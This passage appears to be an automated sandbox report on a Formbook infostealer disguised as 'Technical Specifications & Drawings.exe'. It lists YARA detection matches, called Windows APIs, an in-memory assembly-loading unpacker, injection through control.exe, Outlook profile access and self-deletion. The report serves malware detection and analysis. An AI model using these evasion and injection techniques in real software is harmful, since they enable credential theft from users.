          Source: 00000005.00000000.314845901.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000013.00000002.513252120.0000000004260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000013.00000002.513252120.0000000004260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000013.00000002.513252120.0000000004260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000013.00000002.510569655.0000000002A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000013.00000002.510569655.0000000002A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000013.00000002.510569655.0000000002A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.260249710.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000000.260249710.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.260249710.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.333361957.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000000.333361957.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.333361957.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.265706280.00000000039FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.265706280.00000000039FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.265706280.00000000039FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: Technical Specifications & Drawings.exe PID: 6080, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: Technical Specifications & Drawings.exe PID: 5084, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: control.exe PID: 1896, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 0_2_00E7CD040_2_00E7CD04
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 0_2_00E7F0D00_2_00E7F0D0
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 0_2_00E7F0770_2_00E7F077
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 0_2_028E0C100_2_028E0C10
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 0_2_028E0C400_2_028E0C40
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 0_2_028E40D10_2_028E40D1
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017C41204_2_017C4120
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017AF9004_2_017AF900
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017C99BF4_2_017C99BF
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_018720A84_2_018720A8
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA8304_2_017CA830
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_018728EC4_2_018728EC
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_018610024_2_01861002
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0187E8244_2_0187E824
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D20A04_2_017D20A0
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017BB0904_2_017BB090
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CAB404_2_017CAB40
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0186DBD24_2_0186DBD2
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_018603DA4_2_018603DA
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_018523E34_2_018523E3
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA3094_2_017CA309
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017DABD84_2_017DABD8
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01872B284_2_01872B28
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017DEBB04_2_017DEBB0
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_018722AE4_2_018722AE
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01864AEF4_2_01864AEF
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0185FA2B4_2_0185FA2B
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01862D824_2_01862D82
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A0D204_2_017A0D20
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_018725DD4_2_018725DD
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01872D074_2_01872D07
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017BD5E04_2_017BD5E0
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01871D554_2_01871D55
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D25814_2_017D2581
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_018644964_2_01864496
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017B841F4_2_017B841F
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0186D4664_2_0186D466
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0187DFCE4_2_0187DFCE
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01871FF14_2_01871FF1
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017C6E304_2_017C6E30
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01872EF74_2_01872EF7
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0186D6164_2_0186D616
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: String function: 017AB150 appears 133 times
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9910 NtAdjustPrivilegesToken,LdrInitializeThunk,4_2_017E9910
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E99A0 NtCreateSection,LdrInitializeThunk,4_2_017E99A0
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9860 NtQuerySystemInformation,LdrInitializeThunk,4_2_017E9860
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9840 NtDelayExecution,LdrInitializeThunk,4_2_017E9840
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E98F0 NtReadVirtualMemory,LdrInitializeThunk,4_2_017E98F0
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9A50 NtCreateFile,LdrInitializeThunk,4_2_017E9A50
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9A20 NtResumeThread,LdrInitializeThunk,4_2_017E9A20
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9A00 NtProtectVirtualMemory,LdrInitializeThunk,4_2_017E9A00
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9540 NtReadFile,LdrInitializeThunk,4_2_017E9540
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E95D0 NtClose,LdrInitializeThunk,4_2_017E95D0
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9710 NtQueryInformationToken,LdrInitializeThunk,4_2_017E9710
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9FE0 NtCreateMutant,LdrInitializeThunk,4_2_017E9FE0
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E97A0 NtUnmapViewOfSection,LdrInitializeThunk,4_2_017E97A0
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9780 NtMapViewOfSection,LdrInitializeThunk,4_2_017E9780
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9660 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_017E9660
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E96E0 NtFreeVirtualMemory,LdrInitializeThunk,4_2_017E96E0
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9950 NtQueueApcThread,4_2_017E9950
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E99D0 NtCreateProcessEx,4_2_017E99D0
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017EB040 NtSuspendThread,4_2_017EB040
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9820 NtEnumerateKey,4_2_017E9820
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E98A0 NtWriteVirtualMemory,4_2_017E98A0
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9B00 NtSetValueKey,4_2_017E9B00
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017EA3B0 NtGetContextThread,4_2_017EA3B0
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9A10 NtQuerySection,4_2_017E9A10
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9A80 NtOpenDirectoryObject,4_2_017E9A80
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9560 NtWriteFile,4_2_017E9560
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017EAD30 NtSetContextThread,4_2_017EAD30
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9520 NtWaitForSingleObject,4_2_017E9520
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E95F0 NtQueryInformationFile,4_2_017E95F0
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017EA770 NtOpenThread,4_2_017EA770
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9770 NtSetInformationFile,4_2_017E9770
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9760 NtOpenProcess,4_2_017E9760
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9730 NtQueryVirtualMemory,4_2_017E9730
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017EA710 NtOpenProcessToken,4_2_017EA710
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9670 NtQueryInformationProcess,4_2_017E9670
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9650 NtQueryValueKey,4_2_017E9650
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9610 NtEnumerateValueKey,4_2_017E9610
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E96D0 NtCreateKey,4_2_017E96D0
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.263993924.00000000029B4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWebName.dll4 vs Technical Specifications & Drawings.exe
          Source: Technical Specifications & Drawings.exe, 00000000.00000000.238895450.00000000004C6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameFileSh.exeB vs Technical Specifications & Drawings.exe
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.276069305.00000000070C0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameDoncepre.dll@ vs Technical Specifications & Drawings.exe
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.265706280.00000000039FD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDoncepre.dll@ vs Technical Specifications & Drawings.exe
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.275768947.0000000006F70000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameWebName.dll4 vs Technical Specifications & Drawings.exe
          Source: Technical Specifications & Drawings.exe, 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Technical Specifications & Drawings.exe
          Source: Technical Specifications & Drawings.exe, 00000004.00000003.261218393.0000000001562000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Technical Specifications & Drawings.exe
          Source: Technical Specifications & Drawings.exe, 00000004.00000003.263343456.0000000001702000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Technical Specifications & Drawings.exe
          Source: Technical Specifications & Drawings.exeBinary or memory string: OriginalFilenameFileSh.exeB vs Technical Specifications & Drawings.exe
          Source: Technical Specifications & Drawings.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: Technical Specifications & Drawings.exeVirustotal: Detection: 32%
          Source: Technical Specifications & Drawings.exeReversingLabs: Detection: 21%
          Source: Technical Specifications & Drawings.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\Technical Specifications & Drawings.exe "C:\Users\user\Desktop\Technical Specifications & Drawings.exe"
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeProcess created: C:\Users\user\Desktop\Technical Specifications & Drawings.exe C:\Users\user\Desktop\Technical Specifications & Drawings.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeProcess created: C:\Users\user\Desktop\Technical Specifications & Drawings.exe C:\Users\user\Desktop\Technical Specifications & Drawings.exeJump to behavior
          Source: C:\Windows\SysWOW64\control.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Technical Specifications & Drawings.exe.logJump to behavior
          Source: C:\Windows\SysWOW64\control.exeFile created: C:\Users\user\AppData\Local\Temp\207G7-97PJump to behavior
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/2@14/6
          Source: Technical Specifications & Drawings.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: Technical Specifications & Drawings.exe, ProcExpGUI/Form1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: 0.0.Technical Specifications & Drawings.exe.400000.0.unpack, ProcExpGUI/Form1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Windows\SysWOW64\control.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
          Source: Technical Specifications & Drawings.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Technical Specifications & Drawings.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: wntdll.pdbUGP source: Technical Specifications & Drawings.exe, 00000004.00000003.260883902.000000000144C000.00000004.00000800.00020000.00000000.sdmp, Technical Specifications & Drawings.exe, 00000004.00000003.262790961.00000000015E3000.00000004.00000800.00020000.00000000.sdmp, Technical Specifications & Drawings.exe, 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000003.349077296.000000000423C000.00000004.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000003.346500614.000000000409E000.00000004.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000002.515758890.00000000044EF000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000002.513604126.00000000043D0000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: Technical Specifications & Drawings.exe, Technical Specifications & Drawings.exe, 00000004.00000003.260883902.000000000144C000.00000004.00000800.00020000.00000000.sdmp, Technical Specifications & Drawings.exe, 00000004.00000003.262790961.00000000015E3000.00000004.00000800.00020000.00000000.sdmp, Technical Specifications & Drawings.exe, 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000003.349077296.000000000423C000.00000004.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000003.346500614.000000000409E000.00000004.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000002.515758890.00000000044EF000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000002.513604126.00000000043D0000.00000040.00000800.00020000.00000000.sdmp

          Data Obfuscation

          barindex
          .NET source code contains potential unpacker
          Source: Technical Specifications & Drawings.exe, ProcExpGUI/Form1.cs.Net Code: WaitHandle System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 0.0.Technical Specifications & Drawings.exe.400000.0.unpack, ProcExpGUI/Form1.cs.Net Code: WaitHandle System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 0_2_028EEFEA pushad ; retf 0_2_028EEFF1
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 0_2_028EF78A pushad ; iretd 0_2_028EF791
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017FD0D1 push ecx; ret 4_2_017FD0E4
          Source: initial sampleStatic PE information: section name: .text entropy: 7.780783068719605

          Hooking and other Techniques for Hiding and Protection

          barindex
          Deletes itself after installation
          Source: C:\Windows\SysWOW64\control.exeFile deleted: c:\users\user\desktop\technical specifications & drawings.exeJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
